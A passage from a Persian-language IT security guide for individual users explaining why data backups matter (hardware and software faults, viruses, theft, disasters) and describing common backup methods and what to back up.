‫ﻧﻘﺺ ﺩﺭ ﺳﺨﺖﺍﻓﺰﺍﺭ‬
‫ﺳﺨﺖﺍﻓﺰﺍﺭ ﻣﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﺩﺭ ﻫـﺮ ﺯﻣـﺎﻧﻲ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺩﭼـﺎﺭ‬
‫ﺧﺮﺍﺑﻲ ﺷﻮﺩ ﻭ ﺑﺎﻋﺚ ﺍﺯ ﺑﻴﻦ ﺭﻓﺘﻦ ﺩﺍﺩﻩﻫﺎ ﺩﺭ ﻃﻮﻝ ﻳـﻚ ﻓﺮﺁﻳﻨـﺪ‬
‫ﮔﺮﺩﺩ‪ .‬ﺻﺪﻣﻪﻫﺎﻳﻲ ﻛﻪ ﺑﻪ ﺩﻳﺴﻚ ﻭﺍﺭﺩ ﻣﻲﺷـﻮﺩ ﻧﻴـﺰ ﻣـﻲﺗﻮﺍﻧـﺪ‬
‫ﻣﻨﺠﺮ ﺑﻪ ﺗﺨﺮﻳﺐ ﻛﺎﻣﻞ ﺩﻳﺴﻚ ﺷـﻮﺩ‪ .‬ﻭﻟـﻲ ﭼﻨﺎﻧﭽـﻪ ﺍﺯ ﻓﺎﻳﻠﻬـﺎ‬
‫ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴـﻪ ﺷـﺪﻩ ﺑﺎﺷـﺪ ﻣـﻲﺗـﻮﺍﻥ ﺩﺍﺩﻩﻫـﺎ ﺭﺍ ﻣﺠـﺪﺩﹰﺍ ﺭﻭﻱ‬
‫ﺩﻳﺴﻚﮔﺮﺩﺍﻥ ﻭ ﻳﺎ ﺳﻴﺴﺘﻢ ﺟﺪﻳﺪ ﺑﺎﺯﻳﺎﺑﻲ ﻧﻤﻮﺩ‪.‬‬
‫ﻧﻘﺺ ﺩﺭ ﻧﺮﻡﺍﻓﺰﺍﺭ‬
‫ﺍﻛﺜﺮ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻣﺜﻞ ‪ Microsoft Word‬ﻭ ‪Excel‬‬
‫ﻭ ‪ Access‬ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎﻋﺚ ﺍﺯ ﺑﻴﻦ ﺭﻓـﺘﻦ ﻧﺎﺧﻮﺍﺳـﺘﺔ ﻓﺎﻳﻠﻬـﺎﻱ‬
‫ﺩﺍﺩﻩ ﺷﻮﻧﺪ‪ .‬ﺍﮔﺮ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻭ ﺑﺮﻧﺎﻣﺔ ﻛـﺎﺭﺑﺮﺩﻱ‬
‫ﻞ ﻛﺎﺭﻱ ﺷﻤﺎ ﺭﺍ ﭘـﺎﻙ‬
‫ﺷﻤﺎ ﻧﺎﮔﻬﺎﻥ ﻧﻴﻤﻲ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺣﻴﺎﺗﻲ ﻓﺎﻳ ﹺ‬
‫ﻛﻨﺪ‪ ،‬ﺑﺎﺯ ﻫﻢ ﻗﺎﺩﺭ ﺧﻮﺍﻫﻴﺪ ﺑﻮﺩ ﺩﺍﺩﻩﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑﺎﺯﻳﺎﺑﻲ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‬
‫•‬
‫ﺫﺧﻴﺮﺓ ﻧﺎﺧﻮﺍﺳﺘﻪ ﻳﻚ ﻓﺎﻳﻞ ﺑﺮ ﺭﻭﻱ ﻓﺎﻳﻞ ﺩﻳﮕﺮ؛‬
‫ﺭﻭﻧﺪ ﻧﺎﺩﺭﺳﺖ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺁﻣﺪﻥ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ‬
‫ﺑﺎﻋﺚ ﺗﻐﻴﻴﺮ ﻳﺎ ﭘﺎﻙ ﺷﺪﻥ ﺩﺍﺩﻩﻫﺎ ﺷﻮﺩ؛‬
‫ﻭﺟﻮﺩ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﻣﺨﺮﺏ )ﻣﺜﻞ ﻭﻳﺮﻭﺱ( ﻛﻪ ﺑﺎﻋﺚ ﺗﻐﻴﻴـﺮ‪،‬‬
‫ﺑﺎﺯﻧﻮﻳﺴﻲ ﻭ ﻳﺎ ﺣﺬﻑ ﺩﺍﺩﻩﻫﺎ ﺷﻮﺩ؛‬
‫‪١٨‬‬
‫ﺑﺮﻭﺯ ﻣﺸﻜﻞ ﺩﺭ ﺳﺨﺖﺍﻓﺰﺍﺭ )ﻣﺜﻞ ﻣﺸﻜﻼﺕ ﺩﻳﺴﻚ ﺳﺨﺖ ‪،‬‬
‫ﺩﻳﺴﻚﮔﺮﺩﺍﻥ‪ ،‬ﭘﺮﺩﺍﺯﺷﮕﺮ ﻭ ﻳﺎ ﻣﻨﺒﻊ ﺗﻐﺬﻳﻪ( ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﺑﺎﻋـﺚ‬
‫ﺍﺯ ﺑﻴﻦ ﺭﻓﺘﻦ ﺩﺍﺩﻩﻫﺎ ﮔﺮﺩﺩ؛‬
‫ﺁﺗﺶﺳﻮﺯﻱ ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﺏ ﺑﺮﺍﻱ ﺧﺎﻣﻮﺵ ﻛﺮﺩﻥ ﺭﺍﻳﺎﻧﺔ‬
‫ﺳــﻮﺧﺘﻪ‪ ،‬ﻛــﻪ ﺑﺎﻋــﺚ ﻏﻴﺮﻗﺎﺑــﻞ ﺑﺎﺯﻳــﺎﺑﻲ ﺷــﺪﻥ ﺩﺍﺩﻩﻫــﺎ‬
‫ﻣﻲﺷﻮﺩ؛‬
‫ﻭ ‪...‬‬
‫ﺩﺍﺩﻩﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳﺖ ﻧﻤﻲﺩﻫﻴﺪ ﻭ ﺩﺭ ﺍﻛﺜﺮ ﻣﻮﺍﻗﻊ ﻣﻲﺗﻮﺍﻧﻴـﺪ‬
‫ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺑﺎﺯﻳﺎﺑﻲ ﻛﺮﺩﻩ ﻭ ﺑﻪ ﻳﻚ ﺣﺎﻟﺖ ﻣﺘﻌﺎﺩﻝ ﻭ ﻣﺎﻧﺪﮔﺎﺭ‬
‫ﺑﺮﺳﺎﻧﻴﺪ‪ .‬ﺣﺘﻲ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺩﺍﺩﻩﻫﺎﻱ ﺭﺍﻳﺎﻧﻪ ﺗﻤﺎﻣﹰﺎ ﺍﺯ ﺩﺳﺖ ﺭﻓﺘـﻪ‬
‫ﺑﺎﺷﺪ‪ ،‬ﭼﻨﺎﻧﭽﻪ ﻳﻚ ﻣﺠﻤﻮﻋﺔ ﻛﺎﻣﻞ ﺍﺯ ﻧﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ﺩﺭ‬
‫ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻗﺎﺩﺭ ﺧﻮﺍﻫﻴﺪ ﺑـﻮﺩ ﻫﻤـﺔ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﺭﻭﻱ‬
‫ﺭﺍﻳﺎﻧﺔ ﺟﺪﻳﺪ ﺑﺎﺯﻳﺎﺑﻲ ﻛﻨﻴﺪ ﻭ ﻣﺠﺪﺩﹰﺍ ﺑـﻪ ﺁﻧﻬـﺎ ﺩﺳﺘﺮﺳـﻲ ﺩﺍﺷـﺘﻪ‬
‫ﺑﺎﺷــﻴﺪ‪ .‬ﺍﻟﺒﺘــﻪ ﺍﻳــﻦ ﻣــﺴﺌﻠﻪ ﺻــﺮﻓﹰﺎ ﺯﻣــﺎﻧﻲ ﻛﺎﺭﺁﻣــﺪ ﺍﺳــﺖ ﻛــﻪ‬
‫ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺩﺭ ﺟﺎﻳﻲ ﻏﻴﺮ ﺍﺯ ﺭﺍﻳﺎﻧﺔ ﻗﺮﺑﺎﻧﻲ ﺫﺧﻴﺮﻩ ﺷـﺪﻩ‬
‫ﺑﺎﺷﻨﺪ‪.‬‬
‫‪٥٨‬‬
‫ﻧﻔﻮﺫﻫﺎ ﻭ ﺗﺨﺮﻳﺒﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
‫ﻣﻬــﺎﺟﻤﻴﻦ ﻭ ﻭﻳﺮﻭﺳــﻬﺎﻱ ﻣﺨــﺮﺏ ﻣﺮﺗﺒ ـﹰﺎ ﺑﺎﻋــﺚ ﺗﻐﻴﻴــﺮ ﻭ ﻳــﺎ‬
‫ﭘﺎﻙﺷﺪﻥ ﺩﺍﺩﻩﻫﺎ ﻣﻲﺷﻮﻧﺪ‪ .‬ﻭﺟﻮﺩ ﻧﺴﺨﻪﻫﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ﺩﺭ ﺍﻳـﻦ‬
‫ﺯﻣﻴﻨﻪ ﻧﻴﺰ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻛﻤﻚ ﺷﺎﻳﺎﻧﻲ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺍﻳﻤﻨﻲ ﺩﺭ ﺑﺮﺍﺑﺮ ﺧﻄﺮﺍﺗﻲ ﻛﻪ ﺩﺭ ﺍﺩﺍﺭﻩ ﻭ ﻳـﺎ ﻣﻨـﺰﻝ ﺑـﺎ ﺁﻥ ﻣﻮﺍﺟـﻪ‬
‫ﻫﺴﺘﻴﺪ‪ ،‬ﻣﺆﺛﺮﺗﺮﻳﻦ ﺭﺍﻩ ﺍﺳﺖ‪.‬‬
‫ﻼ ﭼﻨﺪ ﻣﻮﺭﺩ ﺍﺯ ﺷﻴﻮﻩﻫﺎﻱ ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺁﻣﺪﻩ ﺍﺳﺖ‪:‬‬
‫ﺫﻳ ﹰ‬
‫•‬
‫ﻓﺎﻳﻠﻬــﺎﻱ ﺣــﺴﺎﺱ ﺧــﻮﺩ ﺭﺍ ﺭﻭﻱ ﺩﻳــﺴﻚ ﻓﻼﭘــﻲ‪،‬‬
‫ﺩﻳﺴﻜﻬﺎﻱ ﻧﻮﺭﻱ‪ ،‬ﻭ ﻳﺎ ﺩﻳﺴﻜﻬﺎﻱ ﻣﻐﻨﺎﻃﻴﺴﻲ ﺑﺎ ﻇﺮﻓﻴﺖ‬
‫ﺑﺎﻻ ﻛﻪ ﻗﺎﺑﻠﻴﺖ ﭘﺎﻙﻛﺮﺩﻥ ﻧﻴﺰ ﺩﺭ ﺁﻧﻬﺎ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛﭙـﻲ‬
‫ﻛﻨﻴﺪ‪.‬‬
‫•‬
‫ﻣﺤﺘﻮﻳﺎﺕ ﺩﻳﺴﻚ ﺭﺍ ﺭﻭﻱ ﻳﻚ ﺩﻳـﺴﻚ ﺍﻧﻌﻜﺎﺳـﻲ‪ ٢٠‬ﻳـﺎ‬
‫ﺍﮔﺮ ﻓﻀﺎﻱ ﻛـﺎﻓﻲ ﻣﻮﺟـﻮﺩ ﺍﺳـﺖ ﺭﻭﻱ ﻳـﻚ ﺷـﺎﺧﻪ ﺩﺭ‬
‫ﻫﻤﺎﻥ ﺩﻳﺴﻚ ﻣﺎﺩﺭ ﻛﭙﻲ ﻛﻨﻴﺪ‪ .‬ﺍﻟﺒﺘﻪ ﺍﻳﻨﻜﺎﺭ ﺩﺭ ﺧﺮﺍﺑﻴﻬﺎﻱ‬
‫ﺍﺳﺎﺳﻲ ﻛﻤﻚ ﭼﻨﺪﺍﻧﻲ ﻧﻤﻲﻛﻨﺪ ﻭ ﺻﺮﻓﹰﺎ ﺍﮔـﺮ ﺗﻌـﺪﺍﺩﻱ ﺍﺯ‬
‫ﻓﺎﻳﻠﻬﺎ ﺑﻄﻮﺭ ﻧﺎﺧﻮﺍﺳﺘﻪ ﭘﺎﻙ ﺷﻮﻧﺪ ﺑﻜﺎﺭ ﻣﻲﺁﻳﺪ‪.‬‬
‫•‬
‫ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺁﺭﺷﻴﻮ ﻓﺸﺮﺩﻩ ﺳـﺎﺯﻱﺷـﺪﻩﺍﻱ ﺍﺯ ﻓﺎﻳﻠﻬـﺎﻱ‬
‫ﻣﻬﻢ ﺧـﻮﺩ ﺍﻳﺠـﺎﺩ ﻛﻨﻴـﺪ‪ .‬ﺍﻟﺒﺘـﻪ ﻣـﻲﺗـﻮﺍﻥ ﭘـﺸﺘﻴﺒﺎﻧﻬﺎﻱ‬
‫ﻣﺮﺑﻮﻃــﻪ ﺭﺍ ﺭﻭﻱ ﻫﻤــﺎﻥ ﺳﻴــﺴﺘﻢ ﺍﻭﻟﻴــﻪ ﻭ ﻳــﺎ ﺭﻭﻱ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﻳﮕﺮ ﻭ ﺩﺭ ﻣﻜﺎﻧﻬﺎﻱ ﻓﻴﺰﻳﻜﻲ ﻣﺘﻔـﺎﻭﺕ ﻛﭙـﻲ‬
‫ﻧﻤﻮﺩ‪.‬‬
‫•‬
‫ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﺧﻮﺩ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻛﺮﺩﻩ ﻭ ﺍﺯ ﻃﺮﻳـﻖ ﺷـﺒﻜﻪ‬
‫ﻳﺎ ﺍﻳﻨﺘﺮﻧﺖ ﺁﻧﺮﺍ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺩﻳﮕﺮﻱ ﻣﻨﺘﻘﻞ ﻛﻨﻴﺪ‪.‬‬
‫•‬
‫ﺍﮔﺮ ﺩﺭﻧﻈﺮ ﺩﺍﺭﻳﺪ ﻛﻪ ﺩﺭ ﻣﻘﺎﺑﻞ ﺧﺮﺍﺑﻲ ﺩﻳﺴﻜﻬﺎﻱ ﺳﺨﺖ‬
‫ﺍﺯ ﺍﻳﻤﻨﻲ ﺯﻳﺎﺩﻱ ﺑﺮﺧـﻮﺭﺩﺍﺭ ﺑﺎﺷـﻴﺪ ﺩﺭ ﺭﺍﻳﺎﻧـﺔ ﺧـﻮﺩ ﺍﺯ ﺩﻭ‬
‫ﺩﻳﺴﻚ ﺳﺨﺖ ﻭ ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻳﺎ ﺳﺨﺖ ﺍﻓﺰﺍﺭﻱ ﻛﻪ ﺍﺯ ﻫـﺮ‬
‫ﻓﺎﻳﻞ ﻳﻚ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻣﻲ ﻛﻨﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴـﺪ‪ .‬ﺍﻟﺒﺘـﻪ‬
‫ﻻﺯﻡ ﺑﻪ ﺫﻛﺮ ﺍﺳﺖ ﻛﻪ ﺑﺎ ﺭﻋﺎﻳﺖ ﺗﻤﺎﻣﻲ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺑﺎﺯﻫﻢ‬
‫ﺗﻬﻴﺔ ﻣﺪﺍﻭﻡ ﭘﺸﺘﻴﺒﺎﻥ ﺟﻬﺖ ﺣﻔﺎﻇﺖ ﺩﺭ ﺑﺮﺍﺑﺮ ﻣـﺸﻜﻼﺕ‬
‫ﺩﻳﮕﺮ ﺿﺮﻭﺭﻱ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﺍﻃﻼﻋﺎﺕ ﺑﺎﻳﮕﺎﻧﻲ‬
‫ﻧﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ﺑﻌﻨـﻮﺍﻥ ﺍﻃﻼﻋـﺎﺕ ﺑﺎﻳﮕـﺎﻧﻲﺷـﺪﻩ ﺗﻠﻘـﻲ‬
‫ﻣﻲﺷﻮﻧﺪ ﻛﻪ ﺍﻣﻜﺎﻥ ﻣﻘﺎﻳﺴﺔ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎ ﻭ ﺩﺍﺩﻩﻫـﺎﻱ ﺭﺍﻳـﺞ ﺑـﺎ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﻗﺪﻳﻤﻲ ﺭﺍ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﻧﺪ‪ .‬ﺍﻳـﻦ ﻗﺎﺑﻠﻴـﺖ‬
‫ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﺑﺘﻮﺍﻧﻴﺪ ﻣﺸﺨﺺ ﻛﻨﻴﺪ ﻛﻪ ﭼﻪ ﭼﻴﺰﻫﺎﻳﻲ ﻋﻤﺪﹰﺍ ﻳـﺎ‬
‫ﺳﻬﻮﹰﺍ ﺩﭼﺎﺭ ﺗﻐﻴﻴﺮ ﺷﺪﻩﺍﻧﺪ‪ .‬ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈـﻮﺭ ﺍﮔـﺮ ﻧﺨﻮﺍﻫﻴـﺪ ﺑـﻪ‬
‫ﻋﻘــﺐ ﺑﺮﮔــﺸﺘﻪ ﻭ ﺗﺎﺭﻳﺨﭽــﺔ ﻳــﻚ ﭘــﺮﻭﮊﻩ ﺭﺍ ﺑﺎﺯﺳــﺎﺯﻱ ﻛﻨﻴــﺪ‬
‫ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﻣﻨﺎﺑﻊ ﺍﺭﺯﺷﻤﻨﺪﻱ ﺑﺸﻤﺎﺭ ﻣﻲﺁﻳﻨﺪ‪.‬‬
‫ﺳﺮﻗﺖ‬
‫ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﻓﺮﻭﺵ ﺁﻧﻬﺎ ﻛﺎﺭ ﺑﺴﻴﺎﺭ ﺁﺳﺎﻧﻲ ﺍﺳﺖ‪ .‬ﺑـﺎ ﺗﻮﺟـﻪ‬
‫ﺑﻪ ﺍﻳﻦ ﻣﺴﺌﻠﻪ‪ ،‬ﺗﻬﻴﺔ ﻧـﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ﻭ ﺫﺧﻴـﺮﺓ ﺁﻧﻬـﺎ ﺩﺭ‬
‫ﻣﺤﻠﻲ ﺧﺎﺭﺝ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﻭ ﺩﺭ ﻣﻜﺎﻧﻲ ﺍﻣﻦ ﻛﻤـﻚ ﺷـﺎﻳﺎﻧﻲ ﺧﻮﺍﻫـﺪ‬
‫ﺑﻮﺩ‪ ،‬ﭼﺮﺍﻛﻪ ﻣﻮﺍﺭﺩ ﺑﺴﻴﺎﺭﻱ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﻛـﻪ ﭘـﺸﺘﻴﺒﺎﻧﻬﺎ ﻧﻴـﺰ ﺑـﻪ‬
‫ﻫﻤﺮﺍﻩ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﺳﺮﻗﺖ ﺑﺮﺩﻩ ﺷﺪﻩﺍﻧﺪ‪.‬‬
‫ﺑﻼﻳﺎﻱ ﻃﺒﻴﻌﻲ‬
‫ﻭﻗﻮﻉ ﺍﺗﻔﺎﻗﺎﺗﻲ ﻧﻈﻴﺮ ﺳﻴﻞ‪ ،‬ﺯﻟﺰﻟﻪ ﻭ ﺁﺗﺶﺳﻮﺯﻱ ﺍﻫﻤﻴﺖ ﺣﻔﺎﻇـﺖ‬
‫ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺑﻴﺸﺘﺮ ﺭﻭﺷﻦ ﻣـﻲﻛﻨﻨـﺪ‪ .‬ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ ﻧﮕﻬـﺪﺍﺭﻱ‬
‫ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺩﺭ ﻣﺤﻠﻬﺎﻱ ﺩﻳﮕﺮ ﺑﺴﻴﺎﺭ ﻣﻔﻴﺪ ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪.‬‬
‫ﺑﻼﻳﺎﻱ ﺩﻳﮕﺮ‬
‫ﺑﻌﻀﻲ ﻣﻮﺍﻗﻊ ﻧﺸﺖ ﻟﻮﻟﻪﻫﺎﻱ ﮔﺎﺯ ﻭ ﻣﺘﻌﺎﻗﺒﹰﺎ ﺁﺗﺶﺳﻮﺯﻱ ﻧﺎﺷﻲ ﺍﺯ‬
‫ﺁﻥ ﻳﺎ ﺭﻳﺨﺘﻪﺷﺪﻥ ﻣﻮﺍﺩ ﻣﺎﻳﻊ ﺭﻭﻱ ﺩﺳﺘﮕﺎﻩ ﺗﻬﻮﻳـﻪ ﺑﺎﻋـﺚ ﺑـﺮﻭﺯ‬
‫ﻣﺸﻜﻞ ﻣﻲﮔﺮﺩﺩ‪ .‬ﺩﺭ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﻧﻴﺰ ﻭﺟﻮﺩ ﻧﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ‬
‫ﺑﺴﻴﺎﺭ ﺣﻴﺎﺗﻲ ﺍﺳﺖ‪.‬‬
‫ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﻧﻘﺶ ﻣﺆﺛﺮﻱ ﻛﻪ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ‬
‫ﻭﺟﻮﺩ ﺍﹶﺷﻜﺎﻝ ﮔﻮﻧﺎﮔﻮﻥ ﺁﻧﻬﺎ ﭼﻨﺪﺍﻥ ﻋﺠﻴﺐ ﻧﻴﺴﺖ‪ .‬ﻧﻜﺘـﺔ ﻗﺎﺑـﻞ‬
‫ﺗﻮﺟﻪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﭘـﺸﺘﻴﺒﺎﻥ ﺑﻜﺎﺭﺭﻓﺘـﻪ ﺩﺭ ﻫﺮﻛـﺪﺍﻡ ﺍﺯ ﺷـﺮﺍﻳﻂ‬
‫ﻓﻮﻕ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺍﻱ ﺷﺮﺍﻳﻂ ﺩﻳﮕﺮ ﻛﺎﺭﺑﺮﺩﻱ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺑﻪ‬
‫ﺧــﺎﻃﺮ ﺩﺍﺷــﺘﻪ ﺑﺎﺷــﻴﺪ ﻛــﻪ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﺣﻔﺎﻇــﺖ ﭼﻨﺪﻻﻳــﻪ ﻭ‬
‫ﺑﻜﺎﺭﮔﻴﺮﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﮔﻮﻧﺎﮔﻮﻥ ﺗﻬﻴﺔ ﭘـﺸﺘﻴﺒﺎﻥ ﺟﻬـﺖ ﺍﻳﺠـﺎﺩ‬
‫ﺍﺯ ﭼﻪ ﭼﻴﺰﻫﺎﻳﻲ ﺑﺎﻳﺪ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻛﺮﺩ؟‬
‫ﺩﻭ ﺩﻳﺪﮔﺎﻩ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪:‬‬
‫‪.۱‬‬
‫ﺍﺯ ﺗﻤﺎﻡ ﻓﺎﻳﻠﻬﺎﻳﻲ ﻛﻪ ﺍﺧﺘﺼﺎﺻﻲ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺍﺳﺖ ‪ -‬ﺍﻟﺒﺘﻪ‬
‫ﻏﻴﺮ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ‪ -‬ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻛﻨﻴﺪ‪ .‬ﺍﻳـﻦ‬
‫ﺍﻣﺮ ﺩﺭ ﻗﺪﻡ ﺍﻭﻝ ﺷﺎﻣﻞ ﻓﺎﻳﻠﻬﺎﻱ ﺩﺍﺩﻩﺍﻱ ﻣـﻲﺷـﻮﺩ ﻭﻟـﻲ‬
‫ﺩﻗــﺖ ﺩﺍﺷــﺘﻪ ﺑﺎﺷــﻴﺪ ﻛــﻪ ﺑﺎﻳــﺪ ﺍﺯ ﺗﻤــﺎﻡ ﻓﺎﻳﻠﻬــﺎﻳﻲ ﻛــﻪ‬
‫‪Mirror Disks‬‬
‫‪20‬‬
‫‪٥٩‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬
‫‪.۲‬‬
‫ﺍﺯ ﻫﻤﻪ ﭼﻴﺰ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻛﻨﻴـﺪ‪ .‬ﺑـﺎ ﺗﻬﻴـﺔ ﭘـﺸﺘﻴﺒﺎﻥ ﺍﺯ‬
‫ﺗﻤﺎﻡ ﺳﻴـﺴﺘﻢ ‪ -‬ﺑـﺴﺘﻪ ﺑـﻪ ﻧـﻮﻉ ﺍﺳـﺘﻔﺎﺩﻩﺍﻱ ﻛـﻪ ﺍﺯ ﺁﻥ‬
‫ﻣﻲﺷﻮﺩ ‪ -‬ﻣـﻲﺗـﻮﺍﻥ ﻛـﻞ ﺳﻴـﺴﺘﻢ ﺭﺍ ﺩﺭﺻـﻮﺭﺕ ﻟـﺰﻭﻡ‬
‫ﺑﺎﺯﻳﺎﺑﻲ ﻛﺮﺩ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻗـﺎﺩﺭ ﺧﻮﺍﻫﻴـﺪ ﺑـﻮﺩ ﻓﺎﻳﻠﻬـﺎ ﻭ ﻳـﺎ‬
‫ﺷﺎﺧﻪﻫﺎﻱ ﺧﺎﺹ ﺭﺍ ﺑﺎﺯﻳﺎﺑﻲ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﻣﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻫﺮ ﺩﻭ ﺭﻭﺵ ﺭﺍ ﺑﺼﻮﺭﺕ ﻫﻤﺰﻣﺎﻥ ﺗﻮﺻﻴﻪ ﻣﻲﻛﻨﻴﻢ‪:‬‬
‫‪.۱‬‬
‫ﺑﻪ ﻣﺤﺾ ﺗﻜﻤﻴﻞ ﻧﺼﺐ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺍﺯ ﺗﻤـﺎﻡ ﻓﺎﻳﻠﻬـﺎ ﻭ‬
‫ﻼ ﻫﺮ ﭼﻨـﺪ ﻣـﺎﻩ‬
‫ﻣﺸﺨﺼﺎﺕ ﺭﺍﻳﺎﻧﻪ ﺑﺼﻮﺭﺕ ﻣﺘﻨﺎﻭﺏ ‪ -‬ﻣﺜ ﹰ‬
‫ﻳﻜﺒﺎﺭ ‪ -‬ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫‪.۲‬‬
‫ﺍﺯ ﺩﺍﺩﻩ ﻫﺎﻱ ﺷﺨـﺼﻲ ﺧـﻮﺩ ﻃﺒـﻖ ﻳـﻚ ﺯﻣﺎﻧﺒﻨـﺪﻱ ﺑـﺎ‬
‫ﺩﻭﺭﻩﻫﺎﻱ ﻛﻮﺗﺎﻫﺘﺮ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻛﻨﻴﺪ‪ .‬ﺑـﺴﺘﻪ ﺑـﻪ ﻧـﻮﻉ‬
‫ﻛﺎﺭﺑﺮﺩ‪ ،‬ﺑﺮﺍﻱ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺭﻭﺷﻬﺎﻱ ﮔﻮﻧـﺎﮔﻮﻧﻲ ﻭﺟـﻮﺩ‬
‫ﺩﺍﺭﺩ‪:‬‬
‫•‬
‫ﺍﺯ ﺗﻤﺎﻡ ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨﺼﻲ ﺧـﻮﺩ ﭘـﺸﺘﻴﺒﺎﻥ ﺗﻬﻴـﻪ‬
‫ﻧﻤﺎﻳﻴﺪ )ﻫﺮ ﭼﻨﺪ ﻣﺎﻩ ﻳﻜﺒﺎﺭ( ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﺣﺠﻢ ﻭﺳﻴﻌﻲ‬
